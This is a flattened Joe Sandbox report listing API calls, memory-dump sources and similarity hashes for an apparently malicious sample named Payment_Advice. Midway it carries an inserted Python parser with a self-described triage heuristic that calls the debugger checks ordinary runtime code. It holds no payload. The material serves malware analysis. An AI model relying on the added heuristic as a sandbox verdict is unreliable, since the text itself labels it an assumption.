                                                                                                      • Part of subcall function 00509620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,005095D6,?,?,?,?,?,00532641,000000FF), ref: 0050963B
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 2821348736-3508440684
                                                                                                    • Opcode ID: 5ad01bc77fae769b9dfc2d2ef8efc13cbf62b7a1de7f56448c3f49d7f2f8495a
                                                                                                    • Instruction ID: 91ea4c628734bf219d526212f185fd196a40b17fcc038e7e8de8b83770329192
                                                                                                    • Opcode Fuzzy Hash: 5ad01bc77fae769b9dfc2d2ef8efc13cbf62b7a1de7f56448c3f49d7f2f8495a
                                                                                                    • Instruction Fuzzy Hash: F6C10971D0460AAAEB24DB74DC49FEEBBA8BF48300F004559F956E72C2D734BA44CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 8e4bdd45eae26688076450b316942d2543b938c228561d450616170c3d0e39ef
                                                                                                    • Instruction ID: 259cd288bd7b6cca43ce63fa16ab051cf17a4cc8e64c65af3dfdb6cd2d8b253a
                                                                                                    • Opcode Fuzzy Hash: 8e4bdd45eae26688076450b316942d2543b938c228561d450616170c3d0e39ef
                                                                                                    • Instruction Fuzzy Hash: 62C24971E046288FDB25CE28AD457EABBB5FF86304F1445EAD44DE7280E774AE818F40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog_swprintf
                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                    • API String ID: 146138363-3282847064
                                                                                                    • Opcode ID: 35878f14cceb273a08eba65709c20949a8862d7e6dc201c866e8571cbc8387a9
                                                                                                    • Instruction ID: cd7aa3a2fcc546274791cfc02a3ac27b6eb38997f2c47eb195268888d532abef
                                                                                                    • Opcode Fuzzy Hash: 35878f14cceb273a08eba65709c20949a8862d7e6dc201c866e8571cbc8387a9
                                                                                                    • Instruction Fuzzy Hash: C832B2715107859BEB14DF74C89AAED3FA9BF55300F084579FD8A8B2C2DB709A49CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00502874
                                                                                                    • _strlen.LIBCMT ref: 00502E3F
                                                                                                      • Part of subcall function 005102BA: __EH_prolog.LIBCMT ref: 005102BF
                                                                                                      • Part of subcall function 00511B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0050BAE9,00000000,?,?,?,00010440), ref: 00511BA0
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00502F91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                    • String ID: CMT
                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                    • Opcode ID: 23e95cbd4da3127327ec7bf0450f69e86a581e4a927e189c9e57c3b7f6c6361c
                                                                                                    • Instruction ID: d9adad85ee70d03c472073384454b0d520b8f109018b4b4049187dbc52bd678f
                                                                                                    • Opcode Fuzzy Hash: 23e95cbd4da3127327ec7bf0450f69e86a581e4a927e189c9e57c3b7f6c6361c
                                                                                                    • Instruction Fuzzy Hash: 576216716002468FDB19DF34C89A6EE3FA5BF55300F08457EEC9A8B2C2DB759985CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0051F844
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0051F910
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051F930
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0051F93A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: 075257bd73bbc52b9c3baed37e3b9236993d9374a1e4f4e66a3113d3814e8be0
                                                                                                    • Instruction ID: a62003851c8350f736864eb6ce10210199db5c1df94a36d851c8a67d8ed6add4
                                                                                                    • Opcode Fuzzy Hash: 075257bd73bbc52b9c3baed37e3b9236993d9374a1e4f4e66a3113d3814e8be0
                                                                                                    • Instruction Fuzzy Hash: 91312975D05219DBEB20DFA4D9897CCBBB8BF08304F1040AAE40DAB260EB759B85DF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
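
The per-function blocks in this listing (the APIs with their ref addresses, the Memory Dump Source .sdmp name, the Similarity identifiers and the Uniqueness Score) are what an analyst pivots on across Joe Sandbox reports, but the page only offers them as flattened text. The parser below is an added example written for this page, not Joe Sandbox code: SAMPLE_REPORT is a constructed, condensed copy of the two blocks at 0051F844 and 00502874, the section and bullet names are exactly those the report uses, and the reading of the .sdmp name fields (4th field = region start, 5th = page protection, which agrees with 0x20 PAGE_EXECUTE_READ for the 00501000 code region and 0x04 PAGE_READWRITE for 0053E000 in this report) is an assumption, as is the classify() heuristic. That heuristic encodes the caveat this block deserves: IsProcessorFeaturePresent(0x17, PF_FASTFAIL_AVAILABLE) followed by IsDebuggerPresent, SetUnhandledExceptionFilter(0) and UnhandledExceptionFilter is the sequence the MSVC runtime emits in its invalid-parameter/security-failure report-fault path, so the functions at 0051F844 and 00528FB5 are ordinary compiled-in runtime code, not evidence of anti-debugging by themselves.

```python
"""Parse Joe Sandbox IDA-plugin function blocks (plain-text extract) into
records. Added example, not Joe Sandbox code: section and bullet names are
those visible in the report; the meaning of the dot-separated fields of a
.sdmp file name is an assumption checked only against this report."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two blocks from this report, condensed ("Associated:",
# "Strings" and plugin lines dropped, one argument list shortened).
SAMPLE_REPORT = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0051F844
• IsDebuggerPresent.KERNEL32 ref: 0051F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 0051F93A
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00502874
• _strlen.LIBCMT ref: 00502E3F
  • Part of subcall function 00511B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF), ref: 00511BA0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00502F91
Uniqueness
Uniqueness Score: -1.00%
"""

API_LINE = re.compile(r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
                      r"(?P<call>.+?),?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})\s*$")
KV_LINE = re.compile(r"^\s*•\s+(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")
DUMP_LINE = re.compile(r"(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")
SCORE_LINE = re.compile(r"^\s*Uniqueness Score:\s*(?P<score>-?[\d.]+)%")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    subcall_of: Optional[int] = None  # set on "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    image_base: int = 0   # the "Offset:" value, i.e. the PE image base
    region_base: int = 0  # assumption: 4th dot-field of the .sdmp file name
    protect: int = 0      # assumption: 5th dot-field, a PAGE_* constant
    fields: dict = field(default_factory=dict)  # Similarity/plugin bullets
    uniqueness: Optional[float] = None

def parse_api(line):
    m = API_LINE.match(line)
    if not m:
        return None
    head, _, tail = m.group("call").partition("(")
    tail = tail.rstrip(")")
    name, _, module = head.rpartition(".")
    return ApiCall(name, module, tail.split(",") if tail else [], int(m.group("ref"), 16),
                   int(m.group("sub"), 16) if m.group("sub") else None)

def parse_report(text):
    records, rec, section = [], FunctionRecord(), None
    for line in filter(str.strip, text.splitlines()):   # skip blank lines
        stripped = line.strip()
        if score := SCORE_LINE.match(line):             # closes a block
            rec.uniqueness = float(score.group("score"))
            records.append(rec)
            rec, section = FunctionRecord(), None
        elif not stripped.startswith("•"):
            section = stripped                          # "APIs", "Similarity", ...
        elif section == "APIs":
            if call := parse_api(line):
                rec.apis.append(call)
        elif (kv := KV_LINE.match(line)) and kv.group("key") == "Source File":
            if d := DUMP_LINE.search(kv.group("val")):
                parts = d.group("name").split(".")
                rec.image_base, rec.region_base = int(d.group("off"), 16), int(parts[3], 16)
                rec.protect = int(parts[4], 16)
        elif kv and kv.group("key") != "Associated":
            rec.fields[kv.group("key")] = kv.group("val")
    return records

CRT_FAILURE_PATH = {"IsProcessorFeaturePresent", "IsDebuggerPresent",
                    "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}

def classify(rec):
    """Triage heuristic (this example's assumption, not a sandbox verdict): direct
    calls drawn only from CRT_FAILURE_PATH, IsProcessorFeaturePresent asking for
    0x17 = PF_FASTFAIL_AVAILABLE, are the MSVC runtime's report-fault path."""
    direct = {a.name for a in rec.apis if a.subcall_of is None}
    if direct <= CRT_FAILURE_PATH and "UnhandledExceptionFilter" in direct:
        return "crt-report-fault-path"
    return "unclassified"
```

Feed the whole text of this section to parse_report() and every block becomes one FunctionRecord; the "Part of subcall function" lines keep their parent address in subcall_of so watch-listed APIs reached through a callee (MultiByteToWideChar via 00511B84 here) are not lost, and fields["API String ID"] is the value to pivot on when comparing this sample against other reports. classify() is deliberately narrow: anything it does not recognise stays "unclassified" rather than being guessed at.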

                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(80000000,0051E5E8,0000001C,0051E7DD,00000000,?,?,?,?,?,?,?,0051E5E8,00000004,00561CEC,0051E86D), ref: 0051E6B4
                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0051E5E8,00000004,00561CEC,0051E86D), ref: 0051E6CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                    • String ID: D
                                                                                                    • API String ID: 401686933-2746444292
                                                                                                    • Opcode ID: 2cdea38ac0e92bd10c6f7611970d5f783f2e70b04307fc3496761467941a2928
                                                                                                    • Instruction ID: 0a0e57774947cd7e3db9d79b6f5d08604cbaaf318f59c98359338afd53c2a8f1
                                                                                                    • Opcode Fuzzy Hash: 2cdea38ac0e92bd10c6f7611970d5f783f2e70b04307fc3496761467941a2928
                                                                                                    • Instruction Fuzzy Hash: 0E01D4326001096BEB14DE29DC09ADD7BAAFFC4324F0CC120ED19D7250D638D9458680
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00528FB5
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00528FBF
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00528FCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: a6d7aa14c04d6814a75fdaf8ae41cfa84161e8acaf79f68548b3b40fee8469d8
                                                                                                    • Instruction ID: 3ab0b9ae9f4d250b1cd7b5426b0094fbaed8648e861deca0574e319f89e4ebed
                                                                                                    • Opcode Fuzzy Hash: a6d7aa14c04d6814a75fdaf8ae41cfa84161e8acaf79f68548b3b40fee8469d8
                                                                                                    • Instruction Fuzzy Hash: 9631D875901229ABCB21DF64DD897DCBBB8BF48310F5041EAE41CA7290EB749F858F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: df5dae998718e51e7b7147ef8a6bf8b62890385756e1e7cc9370a4a2e3ba77d5
                                                                                                    • Instruction ID: 9002ca09c94ffde1709b96e439345171451ac64ad14027fb00b9847ae75b8b18
                                                                                                    • Opcode Fuzzy Hash: df5dae998718e51e7b7147ef8a6bf8b62890385756e1e7cc9370a4a2e3ba77d5
                                                                                                    • Instruction Fuzzy Hash: 8231F6719002596BEF24DE78DC84EFA7FBDEF86314F0445A8E81897292E7309E458B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction ID: fdf8dc2e088e7cde87cc29cfc9e2a4b14520bee61df1bad5eb21b2927d5dfd56
                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction Fuzzy Hash: 9A022B71E002299FDF14CFA9D8806ADBBF1FF89314F258269D919E7381D735AA41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0051AF35
                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0053E72C,?,?), ref: 0051AF84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169056816-0
                                                                                                    • Opcode ID: 8c1328a342e582d9d2beecc5aa4f6dc311339d525991eded8dbe47f943e206ba
                                                                                                    • Instruction ID: 56aa94543c945d00f321252bf84003532c8970cc585574aadb96b656889f7bf0
                                                                                                    • Opcode Fuzzy Hash: 8c1328a342e582d9d2beecc5aa4f6dc311339d525991eded8dbe47f943e206ba
                                                                                                    • Instruction Fuzzy Hash: 3E017C3A200348AAD7109FA4EC46F9A7BFCFF18710F405032FA05E7290E370A959DBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00506DDF,00000000,00000400), ref: 00506C74
                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00506C95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: d9a55cb6e95a10977aed1bcb6d4b8359750dc040dbfecafb933b0efa5f3c5165
                                                                                                    • Instruction ID: 02b4801f58e1618a1ea60064fe7cef2e5311fe98f6c05c588857a16e2417bd9f
                                                                                                    • Opcode Fuzzy Hash: d9a55cb6e95a10977aed1bcb6d4b8359750dc040dbfecafb933b0efa5f3c5165
                                                                                                    • Instruction Fuzzy Hash: DDD0A934344300BFFB040B218D0AF2E3F98BF50B42F18C404B380E80E0DAB48828B628
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005319EF,?,?,00000008,?,?,0053168F,00000000), ref: 00531C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 66ec65ee7f10955995d21279fa10120f206ccbf4cbdbbfc67a76d222ada70458
                                                                                                    • Instruction ID: 2d7573ca4061c3e52ce5f2055e19f11d2cb3c2c4c0edc3941bc951b463fd0fac
                                                                                                    • Opcode Fuzzy Hash: 66ec65ee7f10955995d21279fa10120f206ccbf4cbdbbfc67a76d222ada70458
                                                                                                    • Instruction Fuzzy Hash: 93B14A31210A089FD715CF28C49AB65BFE0FF45365F258658E89ACF2A1C735ED92CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0051F66A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
